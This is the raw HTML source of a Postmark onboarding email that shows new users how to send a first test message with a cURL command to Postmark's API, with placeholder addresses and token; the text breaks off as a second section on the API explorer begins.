td.es-desk-hidden= , table.es-desk-hidden { width:auto!important; overflow:visible!important; = float:none!important; max-height:inherit!important; line-height:inherit!imp= ortant } tr.es-desk-hidden { display:table-row!important } table.es-desk-hi= dden { display:table!important }=0A td.es-desk-menu-hidden { display:table-= cell!important } .es-menu td { width:1%!important } table.es-table-not-adap= t, .esd-block-html table { width:auto!important } table.es-social { display= :inline-block!important } table.es-social td { display:inline-block!importa= nt } .es-desk-hidden { display:table-row!important; width:auto!important; o= verflow:visible!important; max-height:inherit!important } }@media screen an= d (max-width:384px) {.mail-message-content { width:414px!important } }</sty= le>=0A </head>=0A <body class=3D"es-wrapper-color" lang=3D"und" style=3D"fo= nt-family:georgia, times, 'times new roman', serif;width:100%;-webkit-text-= size-adjust:100%;-ms-text-size-adjust:100%;padding:0;Margin:0;background-co= lor:#F5F3EC">=09=09<div style=3D"display: none !important; padding: 0; heig= ht: 1px; font-size: 1px; background-color: inherit !important; opacity: 0; = color: transparent; mso-line-height-rule: exactly; line-height:1px; mso-hid= e:all;">=0A=09=09=09Two simple ways to send your first email with Postmark= =0A=09=09=09<div style=3D"display: none; max-height: 0px; overflow: hidden;= ">=0A=09=09=09=09 =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C =E2=80=8C = =E2=80=8C =E2=80=8C =E2=80=8C=0A=09=09=09</div>=0A=0A=09=09</div>= =0A<table class=3D"es-wrapper" width=3D"100%" cellspacing=3D"0" cellpadding= =3D"0" role=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;bor= der-collapse:collapse;border-spacing:0px;padding:0;Margin:0;width:100%;heig= ht:100%;background-repeat:repeat;background-position:center top;background-= color:#F5F3EC"><tr><td valign=3D"top" style=3D"padding:0;Margin:0"><table c= ellpadding=3D"0" cellspacing=3D"0" class=3D"es-header" align=3D"center" rol= e=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collap= se:collapse;border-spacing:0px;table-layout:fixed !important;width:100%;bac= kground-color:transparent;background-repeat:repeat;background-position:cent= er top"><tr><td align=3D"center" style=3D"padding:0;Margin:0"><table class= =3D"es-header-body" align=3D"center" cellpadding=3D"0" cellspacing=3D"0" bg= color=3D"#FFFFFF" role=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rsp= ace:0pt;border-collapse:collapse;border-spacing:0px;background-color:transp= arent;width:600px"><tr><td align=3D"left"=0Astyle=3D"padding:0;Margin:0"><t= able cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" role=3D"none" style= =3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;bord= er-spacing:0px"><tr><td align=3D"center" valign=3D"top" style=3D"padding:0;= Margin:0;width:600px"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"1= 00%" role=3D"presentation" style=3D"mso-table-lspace:0pt;mso-table-rspace:0= pt;border-collapse:collapse;border-spacing:0px"><tr><td align=3D"center" he= ight=3D"15" bgcolor=3D"#f5f3ec" style=3D"padding:0;Margin:0"></td>=0A=0A </= tr>=0A<tr><td align=3D"center" bgcolor=3D"#f5f3ec" style=3D"padding:0;Margi= n:0"><p style=3D"Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjus= t:none;mso-line-height-rule:exactly;font-family:georgia, times, 'times new = roman', serif;line-height:18px;color:#a9a696;font-size:12px">Having trouble= viewing this email?=C2=A0<a target=3D"_blank" href=3D"https://postmark.lt.= emlnk1.com/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFyay5h= Y3RpdmVob3N0ZWQuY29tJTJGcF92LnBocCUzRmwlM0QzJTI2YyUzRDUxJTI2bSUzRDg1JTI2cyU= zRDgzZjNkMmY4YzJlMWZlOWE0ZmI4OGUzNGU1OWY4YzA4&sig=3DFRM1YbwJQb3ZzZihcZKkvfJ= ZBLcSwS2tQUxJPE2WhQ7&iat=3D1727097336&a=3D%7C%7C477586617%7C%7C&account=3Dp= ostmark%2Eactivehosted%2Ecom&email=3DblV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAx= QgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et= 60&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D51A85A3A200" style=3D"-webkit-t= ext-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly= ;text-decoration:underline;color:#a9a696;font-size:12px">Read it online</a>= </p>=0A</td>=0A</tr>=0A<tr><td align=3D"center" height=3D"15" bgcolor=3D"#f= 5f3ec" style=3D"padding:0;Margin:0"></td>=0A</tr>=0A</table>=0A</td>=0A</tr= >=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A=0A <t= able cellpadding=3D"0" cellspacing=3D"0" class=3D"es-header" align=3D"cente= r" role=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-= collapse:collapse;border-spacing:0px;table-layout:fixed !important;width:10= 0%;background-color:transparent;background-repeat:repeat;background-positio= n:center top"><tr><td align=3D"center" style=3D"padding:0;Margin:0"><table = bgcolor=3D"#fff" class=3D"es-header-body" align=3D"center" cellpadding=3D"0= " cellspacing=3D"0" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;bord= er-collapse:collapse;border-spacing:0px;background-color:#ffffff;width:600p= x" role=3D"none"><tr><td align=3D"left" style=3D"padding:0;Margin:0"><table= cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" role=3D"none" style=3D"= mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-s= pacing:0px"><tr><td align=3D"center" valign=3D"top" style=3D"padding:0;Marg= in:0;width:600px"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"100%"= role=3D"presentation"=0Astyle=3D"mso-table-lspace:0pt;mso-table-rspace:0pt= ;border-collapse:collapse;border-spacing:0px"><tr><td align=3D"center" styl= e=3D"padding:0;Margin:0;padding-top:30px;padding-bottom:30px;font-size:0px"= ><a target=3D"_blank" href=3D"https://postmark.lt.emlnk1.com/Prod/link-trac= ker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZkZXZlbG9wZXIlM= 0Z1dG1fc291cmNlJTNEYWN0aXZlaG9zdGVkJTI2dXRtX21lZGl1bSUzRGVtYWlsJTI2dXRtX2Nh= bXBhaWduJTNEcG1fMjAyMzA3X29uYm9hcmRpbmctdjFfZTE=3D&sig=3DF2EA25dnMZqJz6ErC6= 2MDgY1EHCsymx4iJadLDf2f3jJ&iat=3D1727097336&a=3D%7C%7C477586617%7C%7C&accou= nt=3Dpostmark%2Eactivehosted%2Ecom&email=3DblV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0= eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2= F7l3et60&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D51A85A3A256" style=3D"-we= bkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:e= xactly;text-decoration:underline;color:#0000EE;font-size:14px"><img src=3D"= https://content.app-us1.com/cdn-cgi/image/dpr=3D2,fit=3Dscale-down,format= =3Dauto,onerror=3Dredirect,width=3D650/MnbAp/2022/08/30/4f14024d-dd57-4b66-= a606-bda1d1f9d21f.png" alt style=3D"display:block;border:0;outline:none;tex= t-decoration:none;-ms-interpolation-mode:bicubic" width=3D"185"=0Adata-cf-i= r-is-resized=3D"true"></a>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</t= able>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A=0A <table ce= llpadding=3D"0" cellspacing=3D"0" class=3D"es-content" align=3D"center" rol= e=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collap= se:collapse;border-spacing:0px;table-layout:fixed !important;width:100%"><t= r><td align=3D"center" style=3D"padding:0;Margin:0"><table class=3D"es-cont= ent-body" align=3D"center" cellpadding=3D"0" cellspacing=3D"0" bgcolor=3D"#= ffffff" role=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;bo= rder-collapse:collapse;border-spacing:0px;background-color:#FFFFFF;width:60= 0px"><tr><td align=3D"left" style=3D"padding:0;Margin:0"><table cellpadding= =3D"0" cellspacing=3D"0" width=3D"100%" role=3D"none" style=3D"mso-table-ls= pace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px">= <tr><td align=3D"center" valign=3D"top" style=3D"padding:0;Margin:0;width:6= 00px"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" role=3D"pre= sentation" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collap= se:collapse;border-spacing:0px"><tr><td align=3D"center"=0Aheight=3D"15" st= yle=3D"padding:0;Margin:0"></td>=0A=0A </tr>=0A<tr><td align=3D"left" bgcol= or=3D"#ffffff" style=3D"padding:0;Margin:0;padding-left:30px;padding-right:= 30px"><h1 style=3D"Margin:0;line-height:26px;mso-line-height-rule:exactly;f= ont-family:georgia, times, 'times new roman', serif;font-size:22px;font-sty= le:normal;font-weight:normal;color:#333333;text-align:left">Hi Friend,</h1>= <p style=3D"Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust:non= e;mso-line-height-rule:exactly;font-family:georgia, times, 'times new roman= ', serif;line-height:24px;color:#353942;font-size:16px"><br></p>=0A<p style= =3D"Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-li= ne-height-rule:exactly;font-family:georgia, times, 'times new roman', serif= ;line-height:24px;color:#353942;font-size:16px">Are you ready to put your n= ew Postmark account to work? Because we=E2=80=99re ready to get your emails= delivered! 🚀</p>=0A=0A<p style=3D"Margin:0;-webkit-text-size-adjus= t:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;font-family:g= eorgia, times, 'times new roman', serif;line-height:24px;color:#353942;font= -size:16px"><br></p>=0A<p style=3D"Margin:0;-webkit-text-size-adjust:none;-= ms-text-size-adjust:none;mso-line-height-rule:exactly;font-family:georgia, = times, 'times new roman', serif;line-height:24px;color:#353942;font-size:16= px">Let=E2=80=99s get started by sending a test email to your inbox. Here a= re two quick and simple ways to do that:</p>=0A</td>=0A</tr>=0A<tr><td alig= n=3D"center" height=3D"30" style=3D"padding:0;Margin:0"></td>=0A</tr>=0A=0A= <tr><td align=3D"left" style=3D"padding:0;Margin:0;padding-left:30px;paddi= ng-right:30px"><h1 style=3D"Margin:0;line-height:26px;mso-line-height-rule:= exactly;font-family:georgia, times, 'times new roman', serif;font-size:22px= ;font-style:normal;font-weight:normal;color:#333333;text-align:left"><stron= g>1. Send your first email using cURL</strong></h1></td>=0A</tr>=0A<tr><td = align=3D"center" height=3D"15" style=3D"padding:0;Margin:0"></td>=0A</tr>= =0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>= =0A</tr>=0A</table>=0A=0A <table cellpadding=3D"0" cellspacing=3D"0" class= =3D"es-content es-mobile-hidden" align=3D"center" role=3D"none" style=3D"ms= o-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spa= cing:0px;table-layout:fixed !important;width:100%"><tr><td align=3D"center"= style=3D"padding:0;Margin:0"><table bgcolor=3D"#ffffff" class=3D"es-conten= t-body" align=3D"center" cellpadding=3D"0" cellspacing=3D"0" role=3D"none" = style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse= ;border-spacing:0px;background-color:#FFFFFF;width:600px"><tr><td align=3D"= left" style=3D"padding:0;Margin:0;padding-left:30px;padding-right:30px"><ta= ble cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" role=3D"none" style= =3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;bord= er-spacing:0px"><tr><td align=3D"center" valign=3D"top" style=3D"padding:0;= Margin:0;width:540px"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"1= 00%" role=3D"presentation"=0Astyle=3D"mso-table-lspace:0pt;mso-table-rspace= :0pt;border-collapse:collapse;border-spacing:0px"><tr><td align=3D"center" = height=3D"25" bgcolor=3D"#3B4049" style=3D"padding:0;Margin:0"></td>=0A=0A = </tr>=0A=0A <tr><td align=3D"left" bgcolor=3D"#3B4049" style=3D"padding:0;M= argin:0;padding-left:20px;padding-right:20px"><p style=3D"Margin:0;-webkit-= text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactl= y;font-family:'courier new', courier, 'lucida sans typewriter', 'lucida typ= ewriter', monospace;line-height:23px;color:#4fc47e;font-size:15px">curl "<a= target=3D"_blank" href=3D"https://postmark.lt.emlnk1.com/Prod/link-tracker= ?redirectUrl=3DaHR0cHMlM0ElMkYlMkZhcGkucG9zdG1hcmthcHAuY29tJTJGZW1haWw=3D&s= ig=3D6zeZiDRuJ6vuoAPFiYnGgKhCQr427q7o3DZQbwmREHh4&iat=3D1727097336&a=3D%7C%= 7C477586617%7C%7C&account=3Dpostmark%2Eactivehosted%2Ecom&email=3DblV4Pb2BV= 9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3= l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D51= A85A3A206" style=3D"-webkit-text-size-adjust:none;-ms-text-size-adjust:none= ;mso-line-height-rule:exactly;text-decoration:none;color:#4fc47e;font-size:= 15px;font-family:'courier new', courier, 'lucida sans typewriter', 'lucida = typewriter', monospace">https://api.postmarkapp.com/email</a>" \<br>=C2= =A0=C2=A0-X POST \<br>=C2=A0 -H "Accept: application/json" \<br>=C2=A0 -H "= Content-Type: application/json"=0A\<br>=C2=A0 -H "X-Postmark-Server-Token: = server token" \<br>=C2=A0 -d '{<br>=C2=A0 "From": "<a target=3D"_blank" hre= f=3D"mailto:sender@example.com" style=3D"-webkit-text-size-adjust:none;-ms-= text-size-adjust:none;mso-line-height-rule:exactly;text-decoration:none;col= or:#4fc47e;font-size:15px;font-family:'courier new', courier, 'lucida sans = typewriter', 'lucida typewriter', monospace">sender@example.com</a>",<br>= =C2=A0 "To": "<a target=3D"_blank" href=3D"mailto:receiver@example.com" sty= le=3D"-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-heig= ht-rule:exactly;text-decoration:none;color:#4fc47e;font-size:15px;font-fami= ly:'courier new', courier, 'lucida sans typewriter', 'lucida typewriter', m= onospace">receiver@example.com</a>",<br>=C2=A0 "Subject": "Postmark test",<= br>=C2=A0 "TextBody": "Hello dear Postmark user.",<br>=C2=A0 "HtmlBody": "&= lt;html><body><strong>Hello </strong> dear=C2=A0Postma= rk user.</body></html>",<br>=C2=A0 "MessageStream": "outbound"<= br>}'</p>=0A=0A</td>=0A</tr>=0A<tr><td align=3D"center" height=3D"25" bgcol= or=3D"#3B4049" style=3D"padding:0;Margin:0"></td>=0A</tr>=0A</table>=0A</td= >=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>= =0A=0A <table cellpadding=3D"0" cellspacing=3D"0" class=3D"es-content" alig= n=3D"center" role=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0= pt;border-collapse:collapse;border-spacing:0px;table-layout:fixed !importan= t;width:100%"><tr><td align=3D"center" style=3D"padding:0;Margin:0"><table = class=3D"es-content-body" align=3D"center" cellpadding=3D"0" cellspacing=3D= "0" bgcolor=3D"#ffffff" role=3D"none" style=3D"mso-table-lspace:0pt;mso-tab= le-rspace:0pt;border-collapse:collapse;border-spacing:0px;background-color:= #FFFFFF;width:600px"><tr><td align=3D"left" style=3D"padding:0;Margin:0"><t= able cellpadding=3D"0" cellspacing=3D"0" width=3D"100%" role=3D"none" style= =3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;bord= er-spacing:0px"><tr><td align=3D"center" valign=3D"top" style=3D"padding:0;= Margin:0;width:600px"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"1= 00%" role=3D"presentation" style=3D"mso-table-lspace:0pt;mso-table-rspace:0= pt;border-collapse:collapse;border-spacing:0px"><tr=0Aclass=3D"es-mobile-hi= dden"><td align=3D"center" height=3D"30" style=3D"padding:0;Margin:0"></td>= =0A=0A </tr>=0A<tr><td align=3D"left" bgcolor=3D"#ffffff" style=3D"padding:= 0;Margin:0;padding-left:30px;padding-right:30px"><p style=3D"Margin:0;-webk= it-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exa= ctly;font-family:georgia, times, 'times new roman', serif;line-height:24px;= color:#353942;font-size:16px">Run <a target=3D"_blank" href=3D"https://post= mark.lt.emlnk1.com/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0= bWFya2FwcC5jb20lMkZtYW51YWwlM0Z1dG1fc291cmNlJTNEYWN0aXZlaG9zdGVkJTI2dXRtX21= lZGl1bSUzRGVtYWlsJTI2dXRtX2NhbXBhaWduJTNEcG1fMjAyMzA3X29uYm9hcmRpbmctdjFfZT= ElMjNzZW5kLXRlc3Qtd2l0aC1jdXJs&sig=3DH3wvaEJRWSfbWdqziuhvnPGNwRpToHnHn97Tsu= vY935u&iat=3D1727097336&a=3D%7C%7C477586617%7C%7C&account=3Dpostmark%2Eacti= vehosted%2Ecom&email=3DblV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9sl= FqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=3D83f3d2f= 8c2e1fe9a4fb88e34e59f8c08&i=3D51A85A3A261" style=3D"-webkit-text-size-adjus= t:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;text-decorati= on:underline;color:#0070CC;font-size:16px">this simple cURL command</a> in = your terminal to send your first email. Just add in:=C2=A0</p>=0A<ol> =0A<l= i style=3D"-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line= -height-rule:exactly;font-family:georgia, times, 'times new roman', serif;l= ine-height:24px;Margin-bottom:15px;margin-left:0;color:#353942;font-size:16= px;margin-bottom:5px"><p style=3D"Margin:0;-webkit-text-size-adjust:none;-m= s-text-size-adjust:none;mso-line-height-rule:exactly;font-family:georgia, t= imes, 'times new roman', serif;line-height:24px;color:#353942;font-size:16p= x">your Postmark Server API Token (<a href=3D"https://postmark.lt.emlnk1.co= m/Prod/link-tracker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lM= kZzdXBwb3J0JTJGYXJ0aWNsZSUyRjgxMS13aGF0LWFyZS10aGUtc210cC1kZXRhaWxzLWFwaS10= b2tlbnMtaS1zaG91bGQtYmUtdXNpbmclM0Z1dG1fc291cmNlJTNEYWN0aXZlaG9zdGVkJTI2dXR= tX21lZGl1bSUzRGVtYWlsJTI2dXRtX2NhbXBhaWduJTNEcG1fMjAyMzA3X29uYm9hcmRpbmctdj= FfZTE=3D&sig=3DCHNgwac6wPvWAj2J2hd8vHd5fkvya1rUNeGTzAyFgqkB&iat=3D172709733= 6&a=3D%7C%7C477586617%7C%7C&account=3Dpostmark%2Eactivehosted%2Ecom&email= =3DblV4Pb2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3= D%3D%3AMX9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=3D83f3d2f8c2e1fe9a4fb88e34e59= f8c08&i=3D51A85A3A252" target=3D"_blank"=0Astyle=3D"-webkit-text-size-adjus= t:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;text-decorati= on:underline;color:#0070CC;font-size:16px">here=E2=80=99s how to find that<= /a>)</p>=0A</li> =0A<li style=3D"-webkit-text-size-adjust:none;-ms-text-siz= e-adjust:none;mso-line-height-rule:exactly;font-family:georgia, times, 'tim= es new roman', serif;line-height:24px;Margin-bottom:15px;margin-left:0;colo= r:#353942;font-size:16px;margin-bottom:5px"><p style=3D"Margin:0;-webkit-te= xt-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;= font-family:georgia, times, 'times new roman', serif;line-height:24px;color= :#353942;font-size:16px">a verified email address you can send from in the = "From" field</p>=0A</li> =0A<li style=3D"-webkit-text-size-adjust:none;-ms-= text-size-adjust:none;mso-line-height-rule:exactly;font-family:georgia, tim= es, 'times new roman', serif;line-height:24px;Margin-bottom:15px;margin-lef= t:0;color:#353942;font-size:16px;margin:0"><p style=3D"Margin:0;-webkit-tex= t-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;f= ont-family:georgia, times, 'times new roman', serif;line-height:24px;color:= #353942;font-size:16px">and a recipient email address to receive your test = email (remember, you can only send to verified domains until you've request= ed account approval)</p>=0A</li> </ol><p style=3D"Margin:0;-webkit-text-siz= e-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;font-f= amily:georgia, times, 'times new roman', serif;line-height:24px;color:#3539= 42;font-size:16px">And then=C2=A0see if you can navigate to your inbox fast= er than we can deliver your email.=C2=A0</p>=0A</td>=0A</tr>=0A=0A <tr><td = align=3D"center" height=3D"20" style=3D"padding:0;Margin:0"></td>=0A</tr>= =0A=0A <tr><td align=3D"left" style=3D"padding:0;Margin:0;padding-left:30px= "> =0A<!--[if mso]><a href=3D"https://postmark.lt.emlnk1.com/Prod/link-trac= ker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZtYW51YWwlM0Z1d= G1fc291cmNlJTNEYWN0aXZlaG9zdGVkJTI2dXRtX21lZGl1bSUzRGVtYWlsJTI2dXRtX2NhbXBh= aWduJTNEcG1fMjAyMzA3X29uYm9hcmRpbmctdjFfZTElMjNzZW5kLXRlc3Qtd2l0aC1jdXJs&si= g=3DH3wvaEJRWSfbWdqziuhvnPGNwRpToHnHn97TsuvY935u&iat=3D1727097336&a=3D%7C%7= C477586617%7C%7C&account=3Dpostmark%2Eactivehosted%2Ecom&email=3DblV4Pb2BV9= RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l= 3wen0fcc%2B3IDUIle7T%2F7l3et60&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D51A= 85A3A261" target=3D"_blank" hidden>=0A=09<v:roundrect xmlns:v=3D"urn:schema= s-microsoft-com:vml" xmlns:w=3D"urn:schemas-microsoft-com:office:word" esde= vVmlButton href=3D"https://postmark.lt.emlnk1.com/Prod/link-tracker?redirec= tUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZtYW51YWwlM0Z1dG1fc291cmNl= JTNEYWN0aXZlaG9zdGVkJTI2dXRtX21lZGl1bSUzRGVtYWlsJTI2dXRtX2NhbXBhaWduJTNEcG1= fMjAyMzA3X29uYm9hcmRpbmctdjFfZTElMjNzZW5kLXRlc3Qtd2l0aC1jdXJs&sig=3DH3wvaEJ= RWSfbWdqziuhvnPGNwRpToHnHn97TsuvY935u&iat=3D1727097336&a=3D%7C%7C477586617%= 7C%7C&account=3Dpostmark%2Eactivehosted%2Ecom&email=3DblV4Pb2BV9RS9H3d1woQh= DHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AMX9F3l3wen0fcc%2B= 3IDUIle7T%2F7l3et60&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i=3D51A85A3A261" = =0A style=3D"height:36px; v-text-anchor:middle; width:206px"= arcsize=3D"8%" stroke=3D"f" fillcolor=3D"#007dcc">=0A=09=09<w:anchorlock>= </w:anchorlock>=0A=09=09<center style=3D'color:#ffffff; font-family:georgia= , times, "times new roman", serif; font-size:12px; font-weight:400; line-he= ight:12px; mso-text-raise:1px'>Grab the cURL command →</center>=0A=09= </v:roundrect></a>=0A<![endif]--> =0A<!--[if !mso]><!-- --><span class=3D"m= sohide es-button-border" style=3D"border-style:solid;border-color:#007DCC;b= ackground:#007DCC;border-width:0px;display:inline-block;border-radius:3px;w= idth:auto;mso-hide:all"><a href=3D"https://postmark.lt.emlnk1.com/Prod/link= -tracker?redirectUrl=3DaHR0cHMlM0ElMkYlMkZwb3N0bWFya2FwcC5jb20lMkZtYW51YWwl= M0Z1dG1fc291cmNlJTNEYWN0aXZlaG9zdGVkJTI2dXRtX21lZGl1bSUzRGVtYWlsJTI2dXRtX2N= hbXBhaWduJTNEcG1fMjAyMzA3X29uYm9hcmRpbmctdjFfZTElMjNzZW5kLXRlc3Qtd2l0aC1jdX= Js&sig=3DH3wvaEJRWSfbWdqziuhvnPGNwRpToHnHn97TsuvY935u&iat=3D1727097336&a=3D= %7C%7C477586617%7C%7C&account=3Dpostmark%2Eactivehosted%2Ecom&email=3DblV4P= b2BV9RS9H3d1woQhDHtcGCwnHv0eoRTAxQgIaflbcX9S9slFqWaCFr8Vxg5Onkrig%3D%3D%3AM= X9F3l3wen0fcc%2B3IDUIle7T%2F7l3et60&s=3D83f3d2f8c2e1fe9a4fb88e34e59f8c08&i= =3D51A85A3A261" class=3D"es-button" target=3D"_blank" style=3D"mso-style-pr= iority:100 !important;text-decoration:none;-webkit-text-size-adjust:none;-m= s-text-size-adjust:none;mso-line-height-rule:exactly;color:#FFFFFF;font-siz= e:14px;padding:10px 15px 10px 15px;display:inline-block;background:#007DCC;= border-radius:3px;font-family:georgia, times, 'times new roman',=0Aserif;fo= nt-weight:normal;font-style:normal;line-height:17px;width:auto;text-align:c= enter;mso-padding-alt:0;mso-border-alt:10px solid #007DCC">Grab the cURL co= mmand =E2=86=92</a>=0A</span> =0A<!--<![endif]--></td>=0A</tr>=0A<tr><td al= ign=3D"center" height=3D"30" style=3D"padding:0;Margin:0"></td>=0A</tr>=0A<= tr><td align=3D"center" height=3D"30" style=3D"padding:0;Margin:0"></td>=0A= </tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</td>=0A</tr>=0A</table>=0A</= td>=0A</tr>=0A</table>=0A=0A <table cellpadding=3D"0" cellspacing=3D"0" cla= ss=3D"es-content" align=3D"center" role=3D"none" style=3D"mso-table-lspace:= 0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px;table-= layout:fixed !important;width:100%"><tr><td align=3D"center" style=3D"paddi= ng:0;Margin:0"><table class=3D"es-content-body" align=3D"center" cellpaddin= g=3D"0" cellspacing=3D"0" bgcolor=3D"#ffffff" role=3D"none" style=3D"mso-ta= ble-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing= :0px;background-color:#FFFFFF;width:600px"><tr><td align=3D"left" style=3D"= padding:0;Margin:0"><table cellpadding=3D"0" cellspacing=3D"0" width=3D"100= %" role=3D"none" style=3D"mso-table-lspace:0pt;mso-table-rspace:0pt;border-= collapse:collapse;border-spacing:0px"><tr><td align=3D"center" valign=3D"to= p" style=3D"padding:0;Margin:0;width:600px"><table cellpadding=3D"0" cellsp= acing=3D"0" width=3D"100%" role=3D"presentation" style=3D"mso-table-lspace:= 0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px"><tr><= td align=3D"left"=0Astyle=3D"padding:0;Margin:0;padding-left:30px;padding-r= ight:30px"><h1 style=3D"Margin:0;line-height:26px;mso-line-height-rule:exac= tly;font-family:georgia, times, 'times new roman', serif;font-size:22px;fon= t-style:normal;font-weight:normal;color:#333333"><strong>2. Send an email u= sing the API explorer</strong></h1>=0A</td>=0A</tr>=0A<tr><td align=3D"cent= er" height=3D"15" style=3D"padding:0;Margin:0"></td>=0A</tr>=0A=0A <tr><td = align=3D"center" 